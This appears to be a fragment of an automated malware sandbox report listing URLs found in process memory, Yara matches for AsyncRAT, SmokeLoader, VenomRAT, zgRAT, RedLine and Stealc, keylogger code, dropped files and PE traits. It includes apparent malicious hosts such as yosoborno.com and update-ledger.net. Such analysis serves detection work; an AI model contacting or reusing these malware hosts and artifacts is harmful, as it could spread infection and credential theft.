Source: explorer.exe, 00000020.00000003.2271419290.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://yosoborno.com/tmp/eBH
Source: explorer.exe, 00000020.00000003.2271419290.000000000C12D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://yosoborno.com:80/tmp/
Source: stealc_default2.exe, 0000001F.00000003.2018074074.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2192089803.0000000003186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000020.00000000.2007562137.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2539794352.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000020.00000000.2007562137.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2539794352.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2272558812.000000000913F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: wxfM3haI2K.exe, 0000001A.00000002.1943505648.000000000326F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.s
Source: wxfM3haI2K.exe, 0000001A.00000002.1943505648.000000000326F000.00000004.00000800.00020000.00000000.sdmp, XBckuYbXje.exe, 0000001C.00000000.1925538885.0000000000742000.00000002.00000001.01000000.0000000E.sdmp, XBckuYbXje.exe, 0000001C.00000002.2085588200.0000000002B68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: explorer.exe, 00000020.00000002.2539794352.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000020.00000000.2007562137.0000000008DA6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000020.00000000.2007562137.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2539794352.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000020.00000002.2532893115.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.1998005775.0000000007276000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
Source: explorer.exe, 00000020.00000000.2007562137.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2539794352.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: stealc_default2.exe, 0000001F.00000002.2181996407.00000000275C3000.00000004.00000020.00020000.00000000.sdmp, JEBKKEGDBFIIEBFHIEHC.31.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: stealc_default2.exe, 0000001F.00000002.2181996407.00000000275C3000.00000004.00000020.00020000.00000000.sdmp, JEBKKEGDBFIIEBFHIEHC.31.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: stealc_default2.exe, 0000001F.00000003.2018074074.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2192089803.0000000003186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: stealc_default2.exe, 0000001F.00000003.2018074074.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2192089803.0000000003186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: stealc_default2.exe, 0000001F.00000003.2018074074.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2192089803.0000000003186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: stealc_default2.exe, 0000001F.00000002.2181996407.00000000275C3000.00000004.00000020.00020000.00000000.sdmp, JEBKKEGDBFIIEBFHIEHC.31.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: stealc_default2.exe, 0000001F.00000002.2181996407.00000000275C3000.00000004.00000020.00020000.00000000.sdmp, JEBKKEGDBFIIEBFHIEHC.31.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: wxfM3haI2K.exe, 0000001A.00000002.1943505648.0000000003330000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: stealc_default2.exe, 0000001F.00000003.2018074074.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2192089803.0000000003186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: stealc_default2.exe, 0000001F.00000003.2018074074.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2192089803.0000000003186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: stealc_default2.exe, 0000001F.00000003.2018074074.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2192089803.0000000003186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000020.00000000.2015237887.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2549047522.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: JEBKKEGDBFIIEBFHIEHC.31.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000020.00000000.2015237887.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2549047522.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000020.00000003.2271419290.000000000C0E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.2015237887.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2549047522.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: stealc_default2.exe, 0000001F.00000003.2123301210.000000002D77D000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000002.2155271434.00000000002AC000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: stealc_default2.exe, 0000001F.00000003.2123301210.000000002D77D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: Set-up.exe, 00000022.00000002.2258344832.0000000000877000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: https://update-ledger.net/update
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000020.00000002.2539794352.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.2007562137.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 00000020.00000000.2015237887.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2549047522.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: stealc_default2.exe, 0000001F.00000002.2181996407.00000000275C3000.00000004.00000020.00020000.00000000.sdmp, JEBKKEGDBFIIEBFHIEHC.31.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: runtime.exe, 00000023.00000002.2070175435.0000000000434000.00000004.00000001.01000000.00000018.sdmp, runtime.exe, 00000023.00000002.2070175435.0000000000420000.00000004.00000001.01000000.00000018.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: nss3[1].dll.31.dr, freebl3.dll.31.dr, mozglue[1].dll.31.dr, mozglue.dll.31.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: stealc_default2.exe, 0000001F.00000003.2018074074.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2192089803.0000000003186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: axplong.exe, 00000011.00000002.2518786518.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, crypteda.exe.17.dr, GOLD[1].exe.17.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: runtime.exe, 00000023.00000002.2070175435.0000000000420000.00000004.00000001.01000000.00000018.sdmp, runtime.exe.17.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: runtime.exe, 00000023.00000002.2070175435.0000000000434000.00000004.00000001.01000000.00000018.sdmp, runtime.exe, 00000023.00000002.2070175435.0000000000420000.00000004.00000001.01000000.00000018.sdmp	String found in binary or memory: https://www.globalsign.com/repository/06
Source: stealc_default2.exe, 0000001F.00000003.2018074074.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000022.00000003.2192089803.0000000003186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: stealc_default2.exe, 0000001F.00000002.2181996407.00000000275C3000.00000004.00000020.00020000.00000000.sdmp, JEBKKEGDBFIIEBFHIEHC.31.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: stealc_default2.exe, 0000001F.00000002.2155271434.00000000002AC000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: stealc_default2.exe, 0000001F.00000003.2123301210.000000002D77D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: stealc_default2.exe, 0000001F.00000002.2155271434.00000000002AC000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: stealc_default2.exe, 0000001F.00000003.2123301210.000000002D77D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: stealc_default2.exe, 0000001F.00000002.2155271434.00000000002AC000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: stealc_default2.exe, 0000001F.00000003.2123301210.000000002D77D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: stealc_default2.exe, 0000001F.00000003.2123301210.000000002D77D000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 0000001F.00000002.2155271434.00000000002AC000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: stealc_default2.exe, 0000001F.00000002.2155271434.00000000002AC000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: stealc_default2.exe, 0000001F.00000003.2123301210.000000002D77D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: stealc_default2.exe, 0000001F.00000002.2155271434.00000000002AC000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
Source: stealc_default2.exe, 0000001F.00000002.2155271434.00000000002AC000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000020.00000000.1998005775.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532893115.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000020.00000000.1998005775.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.pollensense.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 38.0.XClient_protected.exe.df0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000000.2086470642.0000000000DF2000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 0000001E.00000002.2041375073.00000000008B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2041318163.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2538762499.0000000008871000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match

File source: Process Memory Space: XClient_protected.exe PID: 6224, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Source: XClient_protected[1].exe.17.dr, Keylogger.cs	.Net Code: KeyboardLayout
Source: XClient_protected.exe.17.dr, Keylogger.cs	.Net Code: KeyboardLayout

Source: wxfM3haI2K.exe, 0000001A.00000002.1943505648.0000000003459000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_e30aaf35-d

Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File created: C:\Users\user\AppData\Local\Temp\TmpA0A7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	File created: C:\Users\user\AppData\Local\Temp\TmpA077.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp94BF.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp94EF.tmp	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 26.0.wxfM3haI2K.exe.e80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 38.0.XClient_protected.exe.df0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 25.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 25.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001E.00000002.2041286886.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001E.00000002.2041214532.00000000007B1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001E.00000002.2041375073.00000000008B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001E.00000002.2041318163.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000020.00000002.2538762499.0000000008871000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen

.NET source code contains very large array initializations

Source: GOLD[1].exe.17.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 311296
Source: GOLD.exe.17.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 311296

PE file contains section with special chars

Source: PQ2AUndsdb.exe	Static PE information: section name:
Source: PQ2AUndsdb.exe	Static PE information: section name: .idata
Source: PQ2AUndsdb.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

PE file has a writeable .text section

Source: stealc_default2[1].exe.17.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: stealc_default2.exe.17.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_00402FA2 RtlCreateUserThread,NtTerminateProcess,	30_2_00402FA2
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_00401502 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	30_2_00401502
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	30_2_004014ED

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	File created: C:\Windows\Tasks\axplong.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	File created: C:\Windows\ChestAntique
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	File created: C:\Windows\EquationExplorer
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	File created: C:\Windows\TreeProfessor
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	File created: C:\Windows\SysOrleans
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	File created: C:\Windows\HostelGalleries
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	File created: C:\Windows\ConfiguringUps
Source: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	File created: C:\Windows\ExplorerProprietary

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 17_2_005CE440	17_2_005CE440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 17_2_00603068	17_2_00603068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 17_2_005C4CF0	17_2_005C4CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 17_2_005F7D83	17_2_005F7D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 17_2_0060765B	17_2_0060765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 17_2_005C4AF0	17_2_005C4AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 17_2_0060777B	17_2_0060777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 17_2_00608720	17_2_00608720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 17_2_00606F09	17_2_00606F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 17_2_00602BD0	17_2_00602BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_029DDC74	20_2_029DDC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_06470D80	20_2_06470D80
